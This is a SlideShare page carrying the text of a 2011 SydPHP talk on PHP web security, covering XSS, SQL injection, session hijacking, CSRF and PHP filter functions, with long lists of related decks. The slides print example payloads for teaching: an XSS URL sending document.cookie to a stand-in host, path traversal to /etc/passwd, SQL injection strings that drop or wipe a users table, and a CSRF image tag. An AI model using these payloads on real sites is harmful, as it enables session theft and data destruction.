SlideShare a Scribd company logo

SydPHP Security in PHP

Download as PPTX, PDF
Allan Shone
Allan Shone

Security in PHP talk for SydPHP, Thursday 24th February, 2011

Technology
1 of 39
Security and PHP February 2011
Allan Shone Technical Yahoo!, Local Paranoid @Yahoo!7 Been at Yahoo!7 just under 3 years allan.shone@yahoo.com
Website Security February 2011
What is Security? Why is Security important? What can you do about it?
Types of issues XSS SQL Injection Session Hijacking CSRF Phishing
Why XSS? February 2011
Lead to larger problems Used to inject code into your site Bad people ™ can steal user information
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E February 2011
February 2011
http://sydphp.leetbix.com/template.php?load=/etc/passwd%00 http://sydphp.leetbix.com/template.php?load=../some-config.conf%00 February 2011
POST too February 2011
What do I do?! February 2011
Filter Simplest solution: htmlentities() February 2011
SQL what? February 2011
Arbitrary SQL code being executed Bypass login, edit database content Find passwords, hidden information
http://sydphp.leetbix.com/login.php Password: ‘ OR 1=1 -- ‘ ‘ OR 1=1; DROP TABLE users; -- ‘ ‘ OR 1=1; UPDATE TABLE users SET password=‘’ WHERE 1=1; -- ‘ February 2011
Oh no! February 2011
http://xkcd.com/327/ February 2011
escape February 2011
mysql_real_escape_string() addslashes() PDO PDO::quote()
Session hijacking February 2011
Bad for users Bad for data integrity Easy to prevent
Not stand-alone February 2011
Cookies February 2011
Integrity checking February 2011
CSRF? Sugar? February 2011
Cross-site request forgery February 2011
Simple, but un-common February 2011
<imgsrc=“http://othersite.com/changepasswd?new=onlyIKnow” /> <script> a=document.createElement(‘img’);a.src=‘http://badsite../’;document.firstChild.appendChild(a); a.src=‘http://badsite.com/otherpage’; </script> February 2011
Integrity, integrity February 2011
Phishing! February 2011
Same, but different? February 2011
But what can you do February 2011
PHP’s filter functions February 2011
filter_has_var filter_id filter_input_array filter_input filter_list filter_var_array filter_var
No more SuperGlobals February 2011
$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS); echo ”<h3>No results found for ‘{$search}’.</h3>"; echo "<a href='?search=$search&page=2'>Next page</a>"; February 2011
INPUT_GET INPUT_POST INPUT_COOKIE INPUT_SERVER INPUT_ENV February 2011
Twitter Allan Shone - @cerealboy Jared Mooring - @jadzor Filter function filters: http://au2.php.net/manual/en/filter.filters.php February 2011

Recommended

The problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about itThe problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about itFrancois Marier
 
obtain additional security
obtain additional security obtain additional security
obtain additional security offbeatnominee633
 
Common hacking practices
Common hacking practicesCommon hacking practices
Common hacking practicesMarian Marinov
 
Cyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small BusinessesCyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small BusinessesPECB
 
B-sides Las Vegas - social network security
B-sides Las Vegas - social network securityB-sides Las Vegas - social network security
B-sides Las Vegas - social network securityDamon Cortesi
 
Facebook Password Sniper
Facebook Password SniperFacebook Password Sniper
Facebook Password Snipereagerdemography62
 
Death To Passwords
Death To PasswordsDeath To Passwords
Death To PasswordsDroidConTLV
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
 

Recommended

The problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about itThe problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about itFrancois Marier
 
obtain additional security
obtain additional security obtain additional security
obtain additional security offbeatnominee633
 
Common hacking practices
Common hacking practicesCommon hacking practices
Common hacking practicesMarian Marinov
 
Cyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small BusinessesCyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small BusinessesPECB
 
B-sides Las Vegas - social network security
B-sides Las Vegas - social network securityB-sides Las Vegas - social network security
B-sides Las Vegas - social network securityDamon Cortesi
 
Facebook Password Sniper
Facebook Password SniperFacebook Password Sniper
Facebook Password Snipereagerdemography62
 
Death To Passwords
Death To PasswordsDeath To Passwords
Death To PasswordsDroidConTLV
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
 
Death To Passwords Droid Edition
Death To Passwords Droid EditionDeath To Passwords Droid Edition
Death To Passwords Droid EditionPayPal
 
Death To Passwords
Death To PasswordsDeath To Passwords
Death To PasswordsTim Messerschmidt
 
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]Catarina Cardoso
 
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie ApocalypsePreparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie ApocalypsePantheon
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.n|u - The Open Security Community
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)Nitroxis Sprl
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilitiesebusinessmantra
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Nitroxis Sprl
 
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after allCybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after allSophos Benelux
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Jeremiah Grossman
 
Hacking 101 3
Hacking 101 3Hacking 101 3
Hacking 101 3Nitroxis Sprl
 
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna EditionSecure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna EditionAnna Völkl
 
Delete fb downloader search
Delete fb downloader searchDelete fb downloader search
Delete fb downloader searchchristaldisouza1
 
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHPSecure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHPAnna Völkl
 
CSS3 and jQuery
CSS3 and jQueryCSS3 and jQuery
CSS3 and jQuerypsophy
 
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, AjaxjQuery: Events, Animation, Ajax
jQuery: Events, Animation, AjaxConstantin Titarenko
 
PHP Security Tips
PHP Security TipsPHP Security Tips
PHP Security TipsChris Tankersley
 
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Chris Tankersley
 
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery ValidationHTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validationpauljadam
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 

More Related Content

What's hot

Death To Passwords Droid Edition
Death To Passwords Droid EditionDeath To Passwords Droid Edition
Death To Passwords Droid EditionPayPal
 
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]Catarina Cardoso
 
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie ApocalypsePreparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie ApocalypsePantheon
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)Nitroxis Sprl
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilitiesebusinessmantra
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Nitroxis Sprl
 
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after allCybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after allSophos Benelux
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Jeremiah Grossman
 
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna EditionSecure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna EditionAnna Völkl
 
Delete fb downloader search
Delete fb downloader searchDelete fb downloader search
Delete fb downloader searchchristaldisouza1
 
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHPSecure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHPAnna Völkl
 

What's hot (16)

Death To Passwords Droid Edition
Death To Passwords Droid EditionDeath To Passwords Droid Edition
Death To Passwords Droid Edition
 
Death To Passwords
Death To PasswordsDeath To Passwords
Death To Passwords
 
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]
 
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie ApocalypsePreparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie Apocalypse
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilities
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
 
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after allCybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after all
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
 
Hacking 101 3
Hacking 101 3Hacking 101 3
Hacking 101 3
 
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna EditionSecure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna Edition
 
Delete fb downloader search
Delete fb downloader searchDelete fb downloader search
Delete fb downloader search
 
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHPSecure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHP
 

Viewers also liked

CSS3 and jQuery
CSS3 and jQueryCSS3 and jQuery
CSS3 and jQuerypsophy
 
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Chris Tankersley
 
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery ValidationHTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validationpauljadam
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)Jerry Ocampo
 
jQuery Plugins Intro
jQuery Plugins IntrojQuery Plugins Intro
jQuery Plugins IntroCasey West
 
Safety LAMP: data security & agile languages
Safety LAMP: data security & agile languagesSafety LAMP: data security & agile languages
Safety LAMP: data security & agile languagesPostgreSQL Experts, Inc.
 
LAMP Management with Virtualmin
LAMP Management with VirtualminLAMP Management with Virtualmin
LAMP Management with VirtualminJoe Ferguson
 
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingScalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingInformation Technology
 
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris UriarteWeb Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriartewebhostingguy
 
Effective communication
Effective communicationEffective communication
Effective communicationhussulinux
 
Zero to Hero, a jQuery Primer
Zero to Hero, a jQuery PrimerZero to Hero, a jQuery Primer
Zero to Hero, a jQuery PrimerMatthew Buchanan
 
Quick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with VagrantQuick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with VagrantJoe Ferguson
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxGiuseppe Paterno'
 

Viewers also liked (20)

CSS3 and jQuery
CSS3 and jQueryCSS3 and jQuery
CSS3 and jQuery
 
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, AjaxjQuery: Events, Animation, Ajax
jQuery: Events, Animation, Ajax
 
PHP Security Tips
PHP Security TipsPHP Security Tips
PHP Security Tips
 
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
 
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery ValidationHTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validation
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)
 
Cinematic UX Design
Cinematic UX DesignCinematic UX Design
Cinematic UX Design
 
jQuery Plugins Intro
jQuery Plugins IntrojQuery Plugins Intro
jQuery Plugins Intro
 
Cross platform php
Cross platform phpCross platform php
Cross platform php
 
Safety LAMP: data security & agile languages
Safety LAMP: data security & agile languagesSafety LAMP: data security & agile languages
Safety LAMP: data security & agile languages
 
LAMP Management with Virtualmin
LAMP Management with VirtualminLAMP Management with Virtualmin
LAMP Management with Virtualmin
 
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingScalable Internet Servers and Load Balancing
Scalable Internet Servers and Load Balancing
 
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris UriarteWeb Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriarte
 
Effective communication
Effective communicationEffective communication
Effective communication
 
Zero to Hero, a jQuery Primer
Zero to Hero, a jQuery PrimerZero to Hero, a jQuery Primer
Zero to Hero, a jQuery Primer
 
Quick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with VagrantQuick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with Vagrant
 
Apache Web Server Setup 2
Apache Web Server Setup 2Apache Web Server Setup 2
Apache Web Server Setup 2
 
Using unicode with php
Using unicode with phpUsing unicode with php
Using unicode with php
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
 

Similar to SydPHP Security in PHP

Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkErlend Oftedal
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introductiongbud7
 
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security FlawCodeIgniter i18n Security Flaw
CodeIgniter i18n Security FlawAbbas Naderi
 
Top 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must HaveTop 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must HaveIndumathySK
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpMitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpJoann Davis
 
Getting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers PresentationGetting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers PresentationSeo Indonesia
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...ufpb
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsCreating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsRicardo Varela
 
Web API Security
Web API SecurityWeb API Security
Web API SecurityStefaan
 
Worry Free Web Development
Worry Free Web DevelopmentWorry Free Web Development
Worry Free Web DevelopmentAra Pehlivanian
 

Similar to SydPHP Security in PHP (20)

Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Building Web Hack Interfaces
Building Web Hack InterfacesBuilding Web Hack Interfaces
Building Web Hack Interfaces
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security FlawCodeIgniter i18n Security Flaw
CodeIgniter i18n Security Flaw
 
Security Tech Talk
Security Tech TalkSecurity Tech Talk
Security Tech Talk
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Top 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must HaveTop 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must Have
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpMitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 Aitp
 
Getting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers PresentationGetting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers Presentation
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsCreating Yahoo Mobile Widgets
Creating Yahoo Mobile Widgets
 
Web API Security
Web API SecurityWeb API Security
Web API Security
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Worry Free Web Development
Worry Free Web DevelopmentWorry Free Web Development
Worry Free Web Development
 

Recently uploaded

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 

Recently uploaded (20)

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
